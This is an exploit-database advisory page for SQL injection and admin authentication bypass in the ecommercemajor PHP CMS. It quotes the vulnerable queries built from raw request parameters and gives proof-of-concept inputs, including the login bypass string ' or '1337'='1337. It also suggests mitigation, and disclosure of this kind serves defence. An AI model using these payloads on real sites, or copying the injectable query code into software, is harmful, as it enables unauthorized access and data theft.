header-logo
Suggest Exploit
vendor:
ecommercemajor
by:
Manish Kishan Tanwar
5.5
CVSS
MEDIUM
SQL Injection and Authentication bypass
89
CWE
Product Name: ecommercemajor
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2015

ecommercemajor ecommerce CMS SQL Injection and Authentication bypass

ecommercemajor is a php based CMS for ecommerce portal. It is vulnerable to SQL injection in the 'product.php' file where the 'productbycat' parameter is not properly filtered before being used in a SQL query. It is also vulnerable to authentication bypass in the 'index.php' file under the '__admin' directory, where the 'username' and 'password' parameters are not properly filtered before being used in a SQL query.

Mitigation:

To mitigate the SQL injection vulnerability, the application should use parameterized queries or prepared statements to ensure that user input is properly sanitized before being used in SQL queries. To mitigate the authentication bypass vulnerability, the application should properly validate and sanitize user input before using it in SQL queries.
Source

Exploit-DB raw data:

##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author        : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date          : 22/01/2015
#Discovered at : IndiShell Lab
#Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email        : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

ecommercemajor is the php based CMS for ecommerce portal

///////////////////////////////
// Vulnerability Description:
///////////////////////////////

SQL injection vulnerability:-
============================== 
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC

http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI


Authentication Bypass:-
============================== 
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is 
-------------------
	if(isset($_POST[login]))
		{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
			$checkresult=mysql_query($check);
			$checkcount=mysql_num_rows($checkresult);
			if($checkcount>0)
				{	
					$checkrow=mysql_fetch_array($checkresult);
					$_SESSION[adminname]=$checkrow[adminname];
					$_SESSION[adminloginstatus]="success";
					echo "<script>window.location='home.php';</script>";
				}
--------------------
POC

open admin panel 
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337



                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
                             --==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3

Navigation

Suggest Exploit

Services By CQR